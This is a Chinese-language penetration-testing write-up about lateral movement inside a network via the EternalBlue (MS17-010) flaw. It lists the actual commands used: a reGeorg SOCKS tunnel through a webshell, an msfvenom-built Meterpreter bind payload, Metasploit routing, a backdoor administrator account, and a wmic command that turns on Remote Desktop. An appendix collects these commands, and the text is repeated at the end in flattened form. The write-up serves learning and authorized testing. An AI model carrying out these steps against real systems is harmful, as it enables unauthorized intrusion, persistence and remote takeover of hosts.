半途而废的测试(二)
字数 1019 2025-08-19 12:41:36

内网渗透测试实战:利用永恒之蓝漏洞进行横向移动

1. 环境准备与初始访问

  1. 代理工具配置

    • 使用reGeorg建立Socks代理通道
    • 命令:python2 reGeorgSocksProxy.py -p 12321 -u http://xxxxxx:9090/exp/exp.jsp
  2. Metasploit框架准备

    • 启动msfconsole
    • 搜索并选择ms17_010漏洞利用模块

2. 内网扫描与目标识别

  1. 扫描内网主机

    • 使用msf进行内网扫描,发现多台存在永恒之蓝漏洞的主机
    • 扫描结果显示约40%的扫描进度就发现了十几台易受攻击主机
  2. 目标选择策略

    • 随机测试多台主机均未成功
    • 发现代理不稳定可能导致利用失败

3. 攻击策略调整

  1. Payload选择

    • 使用正向连接payload:windows/x64/meterpreter/bind_tcp
    • 生成payload命令:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4443 -f exe > ev.exe
  2. 会话建立

    • 上传并执行生成的木马
    • 使用msf连接目标:use exploit/multi/handler + 设置相应参数
  3. 网络拓扑发现

    • 执行ifconfigrun get_local_subnets发现多个网段
    • 添加路由:run autoroute -s 192.168.1.0/24

4. 漏洞利用技巧

  1. 常见问题解决

    • 反弹shell失败可能原因:
      • 缺少到Kali的路由
      • 存在防护设备
    • 解决方案:修改payload执行参数
  2. 权限提升与持久化

    • 添加管理员账号
    • 将账号加入管理员组
    • 开启远程桌面服务:
      wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
      

5. 目标筛选与最终利用

  1. 目标筛选策略

    • 扫描开放3389端口的主机
    • 与存在永恒之蓝漏洞的主机取交集
    • 确定最终目标:192.168.1.144
  2. 成功利用

    • 重复执行前述攻击步骤
    • 成功建立远程桌面连接

6. 经验总结与问题记录

  1. 常见挑战

    • 正向代理连接不稳定
    • 有永恒之蓝漏洞的主机可能未开启3389
    • 开启3389后可能出现"内部错误"
  2. 解决思路

    • 重新梳理目标,进行精确扫描
    • 寻找漏洞与开放端口的交集主机
    • 多次尝试不同payload和参数
  3. 后续方向

    • 向域控目标推进
    • 考虑其他横向移动技术

附录:关键命令速查

# 代理建立
python2 reGeorgSocksProxy.py -p [LOCAL_PORT] -u [TUNNEL_URL]

# Payload生成
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=[PORT] -f exe > output.exe

# 路由添加
run autoroute -s [SUBNET]

# 开启远程桌面
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

注意:实际渗透测试必须获得合法授权,本文仅用于学习目的。

内网渗透测试实战:利用永恒之蓝漏洞进行横向移动 1. 环境准备与初始访问 代理工具配置 : 使用reGeorg建立Socks代理通道 命令: python2 reGeorgSocksProxy.py -p 12321 -u http://xxxxxx:9090/exp/exp.jsp Metasploit框架准备 : 启动msfconsole 搜索并选择ms17_ 010漏洞利用模块 2. 内网扫描与目标识别 扫描内网主机 : 使用msf进行内网扫描,发现多台存在永恒之蓝漏洞的主机 扫描结果显示约40%的扫描进度就发现了十几台易受攻击主机 目标选择策略 : 随机测试多台主机均未成功 发现代理不稳定可能导致利用失败 3. 攻击策略调整 Payload选择 : 使用正向连接payload: windows/x64/meterpreter/bind_tcp 生成payload命令: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4443 -f exe > ev.exe 会话建立 : 上传并执行生成的木马 使用msf连接目标: use exploit/multi/handler + 设置相应参数 网络拓扑发现 : 执行 ifconfig 和 run get_local_subnets 发现多个网段 添加路由: run autoroute -s 192.168.1.0/24 4. 漏洞利用技巧 常见问题解决 : 反弹shell失败可能原因: 缺少到Kali的路由 存在防护设备 解决方案:修改payload执行参数 权限提升与持久化 : 添加管理员账号 将账号加入管理员组 开启远程桌面服务: 5. 目标筛选与最终利用 目标筛选策略 : 扫描开放3389端口的主机 与存在永恒之蓝漏洞的主机取交集 确定最终目标:192.168.1.144 成功利用 : 重复执行前述攻击步骤 成功建立远程桌面连接 6. 经验总结与问题记录 常见挑战 : 正向代理连接不稳定 有永恒之蓝漏洞的主机可能未开启3389 开启3389后可能出现"内部错误" 解决思路 : 重新梳理目标,进行精确扫描 寻找漏洞与开放端口的交集主机 多次尝试不同payload和参数 后续方向 : 向域控目标推进 考虑其他横向移动技术 附录:关键命令速查 注意:实际渗透测试必须获得合法授权,本文仅用于学习目的。